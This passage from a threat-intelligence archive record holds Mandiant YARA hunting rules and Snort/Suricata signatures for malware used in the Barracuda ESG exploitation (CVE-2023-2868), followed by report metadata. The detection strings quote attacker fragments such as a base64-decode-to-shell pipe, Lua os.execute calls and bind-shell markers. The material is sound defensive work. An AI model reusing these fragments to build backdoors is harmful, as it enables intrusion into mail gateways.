M_Hunting_Exploit_Archive_3\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Hunting rule looking for TAR archive with openssl base64 encoded being part of filename o\r\n md5 = \"0d67f50a0bf7a3a017784146ac41ada0\"\r\n strings:\r\n $ustar = { 75 73 74 61 72 }\r\n $b64_openssl = \"openssl\" base64\r\n condition:\r\n filesize \u003c 1MB and\r\n $ustar at 257 and\r\n for any i in (0 .. #ustar) : (\r\n $b64_openssl in (i * 512 .. 
i * 512 + 250)\r\n )\r\n}\r\nrule M_Hunting_Exploit_Archive_CVE_2023_2868\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Hunting rule looking for TAR archive with single quote/backtick as start of filename of e\r\n md5 = \"0d67f50a0bf7a3a017784146ac41ada0\"\r\n strings:\r\n $ustar = { 75 73 74 61 72 }\r\n $qb = \"'`\"\r\n condition:\r\n filesize \u003c 1MB and\r\n $ustar at 257 and\r\n for any i in (0 .. #ustar) : (\r\n $qb at (@ustar[i] + 255)\r\n )\r\n}\r\nrule M_Hunting_Linux_SALTWATER_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Hunting rule looking for strings observed in SALTWATER samples.\"\r\n md5 = \"827d507aa3bde0ef903ca5dec60cdec8\"\r\n strings:\r\n $s1 = { 71 75 69 74 0D 0A 00 00 00 33 8C 25 3D 9C 17 70 08 F9 0C 1A 41 71 55 36 1A 5C 4B 8D 29 7E 0D 78\r\n $s2 = { 00 8B D5 AD 93 B7 54 D5 00 33 8C 25 3D 9C 17 70 08 F9 0C 1A 41 71 55 36 1A 5C 4B 8D 29 7E 0D 78\r\n $s3 = { 71 75 69 74 0D 0A 00 00 00 12 8D 03 07 9C 17 92 08 F0 0C 9A 01 06 08 00 1A 0C 0B 8D 18 0A 0D 0A\r\n condition:\r\n uint32(0) == 0x464c457f and any of them\r\n}\r\nrule M_Hunting_Linux_SALTWATER_2\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Hunting rule looking for strings observed in SALTWATER samples.\"\r\n md5 = \"827d507aa3bde0ef903ca5dec60cdec8\"\r\n strings:\r\n $c1 = \"TunnelArgs\"\r\n $c2 = \"DownloadChannel\"\r\n $c3 = \"UploadChannel\"\r\n $c4 = \"ProxyChannel\"\r\n $c5 = \"ShellChannel\"\r\n $c6 = \"MyWriteAll\"\r\n $c7 = \"MyReadAll\"\r\n $c8 = \"Connected2Vps\"\r\n $c9 = \"CheckRemoteIp\"\r\n $c10 = \"GetFileSize\"\r\n $s1 = \"[-] error: popen failed\"\r\n $s2 = \"/home/product/code/config/ssl_engine_cert.pem\"\r\n $s3 = \"libbindshell.so\"\r\n condition:\r\n uint32(0) == 0x464c457f and (any of ($s*) or 4 of 
($c*))\r\n}\r\nrule FE_Hunting_Linux_Funchook_FEBeta\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Hunting rule looking for strings observed in Funchook library - https://github.com/kubo/f\r\n md5 = \"827d507aa3bde0ef903ca5dec60cdec8\"\r\n strings:\r\n $f = \"funchook_\"\r\n $s1 = \"Enter funchook_create()\"\r\n $s2 = \"Leave funchook_create() =\u003e %p\"\r\n $s3 = \"Enter funchook_prepare(%p, %p, %p)\"\r\n $s4 = \"Leave funchook_prepare(..., [%p-\u003e%p],...) =\u003e %d\"\r\n $s5 = \"Enter funchook_install(%p, 0x%x)\"\r\n $s6 = \"Leave funchook_install() =\u003e %d\"\r\n $s7 = \"Enter funchook_uninstall(%p, 0x%x)\"\r\n $s8 = \"Leave funchook_uninstall() =\u003e %d\"\r\n $s9 = \"Enter funchook_destroy(%p)\"\r\n $s10 = \"Leave funchook_destroy() =\u003e %d\"\r\n $s11 = \"Could not modify already-installed funchook handle.\"\r\n $s12 = \" change %s address from %p to %p\"\r\n $s13 = \" link_map addr=%p, name=%s\"\r\n $s14 = \" ELF type is neither ET_EXEC nor ET_DYN.\"\r\n $s15 = \" not a valid ELF module %s.\"\r\n $s16 = \"Failed to protect memory %p (size=%\"\r\n $s17 = \" protect memory %p (size=%\"\r\n $s18 = \"Failed to unprotect memory %p (size=%\"\r\n $s19 = \" unprotect memory %p (size=%\"\r\n $s20 = \"Failed to unprotect page %p (size=%\"\r\n $s21 = \" unprotect page %p (size=%\"\r\n $s22 = \"Failed to protect page %p (size=%\"\r\n $s23 = \" protect page %p (size=%\"\r\n $s24 = \"Failed to deallocate page %p (size=%\"\r\n $s25 = \" deallocate page %p (size=%\"\r\n $s26 = \" allocate page %p (size=%\"\r\n $s27 = \" try to allocate %p but %p (size=%\"\r\n $s28 = \" allocate page %p (size=%\"\r\n $s29 = \"Could not find a free region near %p\"\r\n $s30 = \" -- Use address %p or %p for function %p\"\r\n condition:\r\n uint32(0) == 0x464c457f and (#f \u003e 5 or 4 of ($s*))\r\n}\r\nrule M_Hunting_Linux_SEASPY_1\r\n{\r\n meta:\r\n author = 
\"Mandiant\"\r\n description = \"Hunting rule looking for strings observed in SEASPY samples.\"\r\n md5 = \"4ca4f582418b2cc0626700511a6315c0\"\r\n strings:\r\n $s1 = \"usage: ./BarracudaMailService \u003cNetwork-Interface\u003e. e.g.: ./BarracudaMailService eth0\"\r\n $s2 = \"NO port code\"\r\n $s3 = \"pcap_lookupnet: %s\"\r\n $s4 = \"Child process id:%d\"\r\n $s5 = \"[*]Success!\"\r\n $s6 = \"enter open tty shell...\"\r\n condition:\r\n uint32(0) == 0x464c457f and all of ($s*)\r\n}\r\nrule M_Hunting_Lua_SEASIDE_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Hunting rule looking for strings observed in SEASIDE samples.\"\r\n md5 = \"cd2813f0260d63ad5adf0446253c2172\"\r\n strings:\r\n $s1 = \"function on_helo()\"\r\n $s2 = \"local bindex,eindex = string.find(helo,'.onion')\"\r\n $s3 = \"helosend = 'pd'..' '..helosend\"\r\n $s4 = \"os.execute(helosend)\"\r\n condition:\r\n (filesize \u003c 1MB) and all of ($s*)\r\n}\r\nrule M_Hunting_SKIPJACK_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Hunting rule looking for strings observed in SKIPJACK installation script.\"\r\n md5 = \"e4e86c273a2b67a605f5d4686783e0cc\"\r\n strings:\r\n $str1 = \"hdr:name() == 'Content-ID'\" base64\r\n $str2 = \"hdr:body() ~= nil\" base64\r\n $str3 = \"string.match(hdr:body(),\\\"^[%w%+/=\\\\r\\\\n]+$\\\")\" base64\r\n $str4 = \"openssl aes-256-cbc\" base64\r\n $str5 = \"mod_content.lua\"\r\n $str6 = \"#!/bin/sh\"\r\n condition:\r\n all of them\r\n}\r\nrule M_Hunting_Lua_SKIPJACK_2\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Hunting rule looking for strings observed in SKIPJACK samples.\"\r\n md5 = \"87847445f9524671022d70f2a812728f\"\r\n strings:\r\n $str1 = \"hdr:name() == 'Content-ID'\"\r\n $str2 = \"hdr:body() ~= nil\"\r\n $str3 = \"string.match(hdr:body(),\\\"^[%w%+/=\\\\r\\\\n]+$\\\")\"\r\n $str4 = \"openssl aes-256-cbc\"\r\n $str5 
= \"| base64 -d| sh 2\u003e\"\r\n condition:\r\n all of them\r\n}\r\nrule M_Hunting_Lua_SEASPRAY_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Hunting rule looking for strings observed in SEASPRAY samples.\"\r\n md5 = \"35cf6faf442d325961935f660e2ab5a0\"\r\n strings:\r\n $str1 = \"string.find(attachment:filename(),'obt075') ~= nil\"\r\n $str2 = \"os.execute('cp '..tostring(tmpfile)..' /tmp/'..attachment:filename())\"\r\n $str3 = \"os.execute('rverify'..' /tmp/'..attachment:filename())\"\r\n condition:\r\n all of them\r\n}\r\nrule M_Hunting_Linux_WHIRLPOOL_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Hunting rule looking for strings observed in WHIRLPOOL samples.\"\r\n md5 = \"177add288b289d43236d2dba33e65956\"\r\n strings:\r\n $s1 = \"error -1 exit\" fullword\r\n $s2 = \"create socket error: %s(error: %d)\\n\" fullword\r\n $s3 = \"connect error: %s(error: %d)\\n\" fullword\r\n $s4 = {C7 00 20 32 3E 26 66 C7 40 04 31 00}\r\n $c1 = \"plain_connect\" fullword\r\n $c2 = \"ssl_connect\" fullword\r\n $c3 = \"SSLShell.c\" fullword\r\n condition:\r\n filesize \u003c 15MB and uint32(0) == 0x464c457f and (all of ($s*) or all of ($c*))\r\n}\r\nSnort/Suricata\r\nalert tcp any any -\u003e \u003cESG_IP\u003e [25,587] (msg:\"M_Backdoor_SEASPY_oXmp\"; flags:S; dsize:\u003e9; content:\"oXmp\"; offset:0; depth:4; threshold:type limit,track by_src,count 1,seconds 3600; sid:1000000; rev:1;)\r\nalert tcp any any -\u003e \u003cESG_IP\u003e [25,587] (msg:\"M_Backdoor_SEASPY_TfuZ\"; flags:S; dsize:\u003e9; content:\"TfuZ\"; offset:0; depth:4; threshold:type limit,track by_src,count 1,seconds 3600; sid:1000001; rev:1;)\r\nSuricata \u003e= 5.0.4\r\nalert tcp any any -\u003e \u003cESG_IP\u003e [25,587] (msg:\"M_Backdoor_SEASPY_1358\"; flags:S; tcp.hdr; content:\"|05 4e|\"; offset:22; depth:2; threshold:type limit,track by_src,count 
1,seconds 3600; sid:1000002; rev:1;)\r\nalert tcp any any -\u003e \u003cESG_IP\u003e [25,587] (msg:\"M_Backdoor_SEASPY_58928\"; flags:S; tcp.hdr; content:\"|e6 30|\"; offset:28; depth:2; byte_test:4,\u003e,16777216,0,big,relative; threshold:type limit,track by_src,count 1,seconds 3600; sid:1000003; rev:1;)\r\nalert tcp any any -\u003e \u003cESG_IP\u003e [25,587] (msg:\"M_Backdoor_SEASPY_58930\"; flags:S; tcp.hdr; content:\"|e6 32|\"; offset:28; depth:2; byte_test:4,\u003e,16777216,0,big,relative; byte_test:2,\u003e,0,0,big,relative; threshold:type limit,track by_src,count 1,seconds 3600; sid:1000004; rev:1;)\r\nalert tcp any any -\u003e \u003cESG_IP\u003e [25,587] (msg:\"M_Backdoor_SEASPY_60826\"; flags:S; tcp.hdr; content:\"|ed 9a|\"; offset:28; depth:2; byte_test:4,\u003e,16777216,0,big,relative; threshold:type limit,track by_src,count 1,seconds 3600; sid:1000005; rev:1;)\r\nalert tcp any any -\u003e \u003cESG_IP\u003e [25,587] (msg:\"M_Backdoor_SEASPY_60828\"; flags:S; tcp.hdr; content:\"|ed 9c|\"; offset:28; depth:2; byte_test:4,\u003e,16777216,0,big,relative; byte_test:2,\u003e,0,0,big,relative; threshold:type limit,track by_src,count 1,seconds 3600; sid:1000006; rev:1;)\r\nMandiant Security Validation Actions\r\nOrganizations can validate their security controls using the following actions with Mandiant Security Validation.\r\nVID Name\r\nA106-463 Command and Control - UNC4841, DNS Query, Variant #1\r\nA106-464 Malicious File Transfer - SALTWATER, Download, Variant #1\r\nA106-465 Malicious File Transfer - SEASPY, Download, Variant #1\r\nA106-466 Malicious File Transfer - SEASIDE, Download, Variant #1\r\nA106-506 Phishing Email - UNC4841, CVE-2023-2868, Malicious Attachment, Variant #1\r\nPosted in\r\nThreat Intelligence\r\nSource: 
https://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://cloud.google.com/blog/topics/threat-intelligence/barracuda-esg-exploited-globally/"
	],
	"report_names": [
		"barracuda-esg-exploited-globally"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a2c3c22a-b3db-4d4a-9a5a-76bfe6171843",
			"created_at": "2023-11-21T02:00:07.315543Z",
			"updated_at": "2026-04-10T02:00:03.461446Z",
			"deleted_at": null,
			"main_name": "UNC4841",
			"aliases": [
				"SLIME57"
			],
			"source_name": "MISPGALAXY:UNC4841",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434050,
	"ts_updated_at": 1775791502,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3123c17f4af5bb8c4bb995066e9f0478cd6eb24e.pdf",
		"text": "https://archive.orkl.eu/3123c17f4af5bb8c4bb995066e9f0478cd6eb24e.txt",
		"img": "https://archive.orkl.eu/3123c17f4af5bb8c4bb995066e9f0478cd6eb24e.jpg"
	}
}